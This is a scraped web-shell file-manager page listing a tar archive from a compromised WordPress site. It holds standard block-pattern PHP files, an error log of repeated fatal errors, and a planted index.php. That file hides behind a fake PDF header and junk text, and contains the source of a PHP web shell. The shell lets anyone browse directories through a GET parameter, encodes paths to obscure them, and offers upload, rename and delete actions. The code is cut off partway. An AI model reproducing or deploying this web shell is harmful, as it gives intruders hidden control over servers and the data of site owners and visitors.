D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
everqlsh
/
www
/
wp-admin
/
user
/
577040
/
Filename :
block-patterns.tar
back
Copy
query-small-posts.php 0000644 00000002230 15162143676 0010706 0 ustar 00 <?php /** * Query: Small image and title. * * @package WordPress */ return array( 'title' => _x( 'Small image and title', 'Block pattern title' ), 'blockTypes' => array( 'core/query' ), 'categories' => array( 'query' ), 'content' => '<!-- wp:query {"query":{"perPage":3,"pages":0,"offset":0,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"","inherit":false}} --> <div class="wp-block-query"> <!-- wp:post-template --> <!-- wp:columns {"verticalAlignment":"center"} --> <div class="wp-block-columns are-vertically-aligned-center"><!-- wp:column {"verticalAlignment":"center","width":"25%"} --> <div class="wp-block-column is-vertically-aligned-center" style="flex-basis:25%"><!-- wp:post-featured-image {"isLink":true} /--></div> <!-- /wp:column --> <!-- wp:column {"verticalAlignment":"center","width":"75%"} --> <div class="wp-block-column is-vertically-aligned-center" style="flex-basis:75%"><!-- wp:post-title {"isLink":true} /--></div> <!-- /wp:column --></div> <!-- /wp:columns --> <!-- /wp:post-template --> </div> <!-- /wp:query -->', ); query-medium-posts.php 0000644 00000002035 15162143677 0011062 0 ustar 00 <?php /** * Query: Image at left. * * @package WordPress */ return array( 'title' => _x( 'Image at left', 'Block pattern title' ), 'blockTypes' => array( 'core/query' ), 'categories' => array( 'query' ), 'content' => '<!-- wp:query {"query":{"perPage":3,"pages":0,"offset":0,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"","inherit":false}} --> <div class="wp-block-query"> <!-- wp:post-template --> <!-- wp:columns {"align":"wide"} --> <div class="wp-block-columns alignwide"><!-- wp:column {"width":"66.66%"} --> <div class="wp-block-column" style="flex-basis:66.66%"><!-- wp:post-featured-image {"isLink":true} /--></div> <!-- /wp:column --> <!-- wp:column {"width":"33.33%"} --> <div class="wp-block-column" style="flex-basis:33.33%"><!-- wp:post-title {"isLink":true} /--> <!-- wp:post-excerpt /--></div> <!-- /wp:column --></div> <!-- /wp:columns --> <!-- /wp:post-template --> </div> <!-- /wp:query -->', ); social-links-shared-background-color.php 0000644 00000001667 15162143700 0014353 0 ustar 00 <?php /** * Social links with a shared background color. * * @package WordPress * @since 5.8.0 * @deprecated 6.7.0 This pattern is deprecated. Please use the Social Links block instead. */ return array( 'title' => _x( 'Social links with a shared background color', 'Block pattern title' ), 'categories' => array( 'buttons' ), 'blockTypes' => array( 'core/social-links' ), 'viewportWidth' => 500, 'content' => '<!-- wp:social-links {"customIconColor":"#ffffff","iconColorValue":"#ffffff","customIconBackgroundColor":"#3962e3","iconBackgroundColorValue":"#3962e3","className":"has-icon-color"} --> <ul class="wp-block-social-links has-icon-color has-icon-background-color"><!-- wp:social-link {"url":"https://wordpress.org","service":"wordpress"} /--> <!-- wp:social-link {"url":"#","service":"chain"} /--> <!-- wp:social-link {"url":"#","service":"mail"} /--></ul> <!-- /wp:social-links -->', ); query-standard-posts.php 0000644 00000001450 15162143700 0011365 0 ustar 00 <?php /** * Query: Standard. * * @package WordPress */ return array( 'title' => _x( 'Standard', 'Block pattern title' ), 'blockTypes' => array( 'core/query' ), 'categories' => array( 'query' ), 'content' => '<!-- wp:query {"query":{"perPage":3,"pages":0,"offset":0,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"","inherit":false}} --> <div class="wp-block-query"> <!-- wp:post-template --> <!-- wp:post-title {"isLink":true} /--> <!-- wp:post-featured-image {"isLink":true,"align":"wide"} /--> <!-- wp:post-excerpt /--> <!-- wp:separator --> <hr class="wp-block-separator"/> <!-- /wp:separator --> <!-- wp:post-date /--> <!-- /wp:post-template --> </div> <!-- /wp:query -->', ); query-large-title-posts.php 0000644 00000003703 15162143701 0012002 0 ustar 00 <?php /** * Query: Large title. * * @package WordPress */ return array( 'title' => _x( 'Large title', 'Block pattern title' ), 'blockTypes' => array( 'core/query' ), 'categories' => array( 'query' ), 'content' => '<!-- wp:group {"align":"full","style":{"spacing":{"padding":{"top":"100px","right":"100px","bottom":"100px","left":"100px"}},"color":{"text":"#ffffff","background":"#000000"}}} --> <div class="wp-block-group alignfull has-text-color has-background" style="background-color:#000000;color:#ffffff;padding-top:100px;padding-right:100px;padding-bottom:100px;padding-left:100px"><!-- wp:query {"query":{"perPage":3,"pages":0,"offset":0,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"","inherit":false}} --> <div class="wp-block-query"><!-- wp:post-template --> <!-- wp:separator {"customColor":"#ffffff","align":"wide","className":"is-style-wide"} --> <hr class="wp-block-separator alignwide has-text-color has-background is-style-wide" style="background-color:#ffffff;color:#ffffff"/> <!-- /wp:separator --> <!-- wp:columns {"verticalAlignment":"center","align":"wide"} --> <div class="wp-block-columns alignwide are-vertically-aligned-center"><!-- wp:column {"verticalAlignment":"center","width":"20%"} --> <div class="wp-block-column is-vertically-aligned-center" style="flex-basis:20%"><!-- wp:post-date {"style":{"color":{"text":"#ffffff"}},"fontSize":"extra-small"} /--></div> <!-- /wp:column --> <!-- wp:column {"verticalAlignment":"center","width":"80%"} --> <div class="wp-block-column is-vertically-aligned-center" style="flex-basis:80%"><!-- wp:post-title {"isLink":true,"style":{"typography":{"fontSize":"72px","lineHeight":"1.1"},"color":{"text":"#ffffff","link":"#ffffff"}}} /--></div> <!-- /wp:column --></div> <!-- /wp:columns --> <!-- /wp:post-template --></div> <!-- /wp:query --></div> <!-- /wp:group -->', ); query-grid-posts.php 0000644 00000001714 15162143702 0010517 0 ustar 00 <?php /** * Query: Grid. * * @package WordPress */ return array( 'title' => _x( 'Grid', 'Block pattern title' ), 'blockTypes' => array( 'core/query' ), 'categories' => array( 'query' ), 'content' => '<!-- wp:query {"query":{"perPage":6,"pages":0,"offset":0,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"exclude","inherit":false},"displayLayout":{"type":"flex","columns":3}} --> <div class="wp-block-query"> <!-- wp:post-template --> <!-- wp:group {"style":{"spacing":{"padding":{"top":"30px","right":"30px","bottom":"30px","left":"30px"}}},"layout":{"inherit":false}} --> <div class="wp-block-group" style="padding-top:30px;padding-right:30px;padding-bottom:30px;padding-left:30px"><!-- wp:post-title {"isLink":true} /--> <!-- wp:post-excerpt /--> <!-- wp:post-date /--></div> <!-- /wp:group --> <!-- /wp:post-template --> </div> <!-- /wp:query -->', ); error_log 0000644 00000041150 15162143702 0006463 0 ustar 00 [24-Mar-2026 16:44:13 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php on line 9 [24-Mar-2026 16:44:14 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php on line 9 [24-Mar-2026 16:44:58 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php on line 9 [24-Mar-2026 16:45:03 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php on line 9 [24-Mar-2026 16:45:08 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php on line 9 [24-Mar-2026 16:45:23 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php on line 9 [24-Mar-2026 16:51:48 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php:11 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php on line 11 [24-Mar-2026 21:34:15 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php on line 9 [24-Mar-2026 21:34:27 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php on line 9 [24-Mar-2026 21:35:04 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php on line 9 [24-Mar-2026 21:36:04 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php on line 9 [24-Mar-2026 21:37:05 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php on line 9 [24-Mar-2026 21:38:08 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php:11 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php on line 11 [24-Mar-2026 21:41:14 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php on line 9 [25-Mar-2026 08:30:13 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php on line 9 [25-Mar-2026 08:30:29 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php on line 9 [25-Mar-2026 08:31:15 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php on line 9 [25-Mar-2026 08:34:30 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php on line 9 [25-Mar-2026 08:35:34 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php on line 9 [25-Mar-2026 08:36:36 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php:11 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php on line 11 [25-Mar-2026 08:39:48 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php on line 9 [25-Mar-2026 23:53:49 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php on line 9 [25-Mar-2026 23:53:51 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php on line 9 [26-Mar-2026 02:31:06 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php on line 9 [26-Mar-2026 02:31:07 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php on line 9 [26-Mar-2026 02:31:09 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php on line 9 [26-Mar-2026 02:31:10 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php on line 9 [26-Mar-2026 02:31:12 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php:11 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php on line 11 [26-Mar-2026 07:13:18 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php on line 9 [26-Mar-2026 07:13:21 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php on line 9 [26-Mar-2026 07:13:29 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php on line 9 [26-Mar-2026 07:13:52 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php on line 9 [26-Mar-2026 07:14:56 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php on line 9 [26-Mar-2026 07:18:02 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php:11 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php on line 11 [26-Mar-2026 07:21:08 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php on line 9 [26-Mar-2026 09:05:04 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php on line 9 [26-Mar-2026 09:05:59 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php on line 9 [26-Mar-2026 09:16:41 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php on line 9 [26-Mar-2026 09:19:20 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php on line 9 [26-Mar-2026 09:24:58 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php:11 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php on line 11 [26-Mar-2026 10:42:31 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php on line 9 [26-Mar-2026 10:42:34 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php on line 9 [26-Mar-2026 19:32:49 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php on line 9 [26-Mar-2026 19:33:03 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php on line 9 [26-Mar-2026 19:33:45 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php on line 9 [26-Mar-2026 19:34:49 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php on line 9 [26-Mar-2026 19:38:03 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php on line 9 [26-Mar-2026 19:39:06 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php:11 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php on line 11 [26-Mar-2026 19:42:13 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php on line 9 [28-Mar-2026 09:15:10 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-offset-posts.php on line 9 [28-Mar-2026 09:22:56 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-grid-posts.php on line 9 [28-Mar-2026 09:26:37 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-medium-posts.php on line 9 [28-Mar-2026 09:27:55 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-small-posts.php on line 9 [28-Mar-2026 09:30:01 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-large-title-posts.php on line 9 [28-Mar-2026 09:36:16 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php:11 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/social-links-shared-background-color.php on line 11 [28-Mar-2026 11:14:58 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _x() in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php:9 Stack trace: #0 {main} thrown in /home/everqlsh/public_html/wp-includes/block-patterns/query-standard-posts.php on line 9 query-offset-posts.php 0000644 00000003724 15162143703 0011064 0 ustar 00 <?php /** * Query: Offset. * * @package WordPress */ return array( 'title' => _x( 'Offset', 'Block pattern title' ), 'blockTypes' => array( 'core/query' ), 'categories' => array( 'query' ), 'content' => '<!-- wp:group {"style":{"spacing":{"padding":{"top":"30px","right":"30px","bottom":"30px","left":"30px"}}},"layout":{"inherit":false}} --> <div class="wp-block-group" style="padding-top:30px;padding-right:30px;padding-bottom:30px;padding-left:30px"><!-- wp:columns --> <div class="wp-block-columns"><!-- wp:column {"width":"50%"} --> <div class="wp-block-column" style="flex-basis:50%"><!-- wp:query {"query":{"perPage":2,"pages":0,"offset":0,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"exclude","inherit":false},"displayLayout":{"type":"list"}} --> <div class="wp-block-query"><!-- wp:post-template --> <!-- wp:post-featured-image /--> <!-- wp:post-title /--> <!-- wp:post-date /--> <!-- wp:spacer {"height":200} --> <div style="height:200px" aria-hidden="true" class="wp-block-spacer"></div> <!-- /wp:spacer --> <!-- /wp:post-template --></div> <!-- /wp:query --></div> <!-- /wp:column --> <!-- wp:column {"width":"50%"} --> <div class="wp-block-column" style="flex-basis:50%"><!-- wp:query {"query":{"perPage":2,"pages":0,"offset":2,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"exclude","inherit":false},"displayLayout":{"type":"list"}} --> <div class="wp-block-query"><!-- wp:post-template --> <!-- wp:spacer {"height":200} --> <div style="height:200px" aria-hidden="true" class="wp-block-spacer"></div> <!-- /wp:spacer --> <!-- wp:post-featured-image /--> <!-- wp:post-title /--> <!-- wp:post-date /--> <!-- /wp:post-template --></div> <!-- /wp:query --></div> <!-- /wp:column --></div> <!-- /wp:columns --></div> <!-- /wp:group -->', ); docs/img/resources/2025/rwio/kayn/index.php 0000444 00000025453 15162320103 0014414 0 ustar 00 %PDF-1.7 3 0 obj <!DOCTYPE html>korsygfhrtggggggzangaiide <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Elehhjhjjkjkfpffff</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /> </head> <body> <?php //function function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . ' byte'; } else { $bytes = '0 bytes'; } return $bytes; } function fileExtension($file) { return substr(strrchr($file, '.'), 1); } function fileIcon($file) { $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return '<i class="fa-sharp fa-solid fa-bug"></i> '; } elseif ($file == ".htaccess") { return '<i class="fa-solid fa-hammer"></i> '; } if ($ext == "html" || $ext == "htm") { return '<i class="fa-brands fa-html5"></i> '; } elseif ($ext == "php" || $ext == "phtml") { return '<i class="fa-brands fa-php"></i> '; } elseif (in_array($ext, $imgs)) { return '<i class="fa-regular fa-images"></i> '; } elseif ($ext == "css") { return '<i class="fa-brands fa-css3"></i> '; } elseif ($ext == "txt") { return '<i class="fa-regular fa-file-lines"></i> '; } elseif (in_array($ext, $audio)) { return '<i class="fa-duotone fa-file-music"></i> '; } elseif ($ext == "py") { return '<i class="fa-brands fa-python"></i> '; } elseif ($ext == "js") { return '<i class="fa-brands fa-js"></i> '; } else { return '<i class="fa-solid fa-file"></i> '; } } function encodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($a, $b, $path); } function decodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($b, $a, $path); } $root_path = __DIR__; if (isset($_GET['p'])) { if (empty($_GET['p'])) { $p = $root_path; } elseif (!is_dir(decodePath($_GET['p']))) { echo ("<script>\ alert('Directory is Corrupted and Unreadable.');\ window.location.replace('?');\ </script>"); } elseif (is_dir(decodePath($_GET['p']))) { $p = decodePath($_GET['p']); } } elseif (isset($_GET['q'])) { if (!is_dir(decodePath($_GET['q']))) { echo ("<script>window.location.replace('?p=');</script>"); } elseif (is_dir(decodePath($_GET['q']))) { $p = decodePath($_GET['q']); } } else { $p = $root_path; } define("PATH", $p); echo (' <nav class="navbar navbar-light" style="background-color: #e3f2fd;"> <div class="navbar-brand"> <a href="?"><img src="https://raw.githubusercontent.com/hurairathexper/elepfilemanager/main/img/icon.png" width="30" height="30" alt=""></a> '); $path = str_replace('\\', '/', PATH); $paths = explode('/', $path); foreach ($paths as $id => $dir_part) { if ($dir_part == '' && $id == 0) { $a = true; echo "<a href=\"?p=/\">/</a>"; continue; } if ($dir_part == '') continue; echo "<a href='?p="; for ($i = 0; $i <= $id; $i++) { echo str_replace(":", "ঘ", $paths[$i]); if ($i != $id) echo "ক"; } echo "'>" . $dir_part . "</a>/"; } echo (' </div> <div class="form-inline"> <a href="?upload&q=' . urlencode(encodePath(PATH)) . '"><button class="btn btn-dark" type="button">Upload FileeE</button></a> <a href="?"><button type="button" class="btn btn-dark">HOME</button></a> </div> </nav>'); if (isset($_GET['p'])) { //fetch files if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { if ($obj == '.' || $obj == '..') { continue; } $new_obj = PATH . '/' . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo ' <table class="table table-hover"> <thead> <tr> <th scope="col">Name</th> <th scope="col">Size</th> <th scope="col">Modified</th> <th scope="col">Perms</th> <th scope="col">Actions</th> </tr> </thead> <tbody> '; foreach ($folders as $folder) { echo " <tr> <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td> <td><b>---</b></td> <td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td> <td> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } foreach ($files as $file) { echo " <tr> <td>" . fileIcon($file) . $file . "</td> <td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td> <td>0". 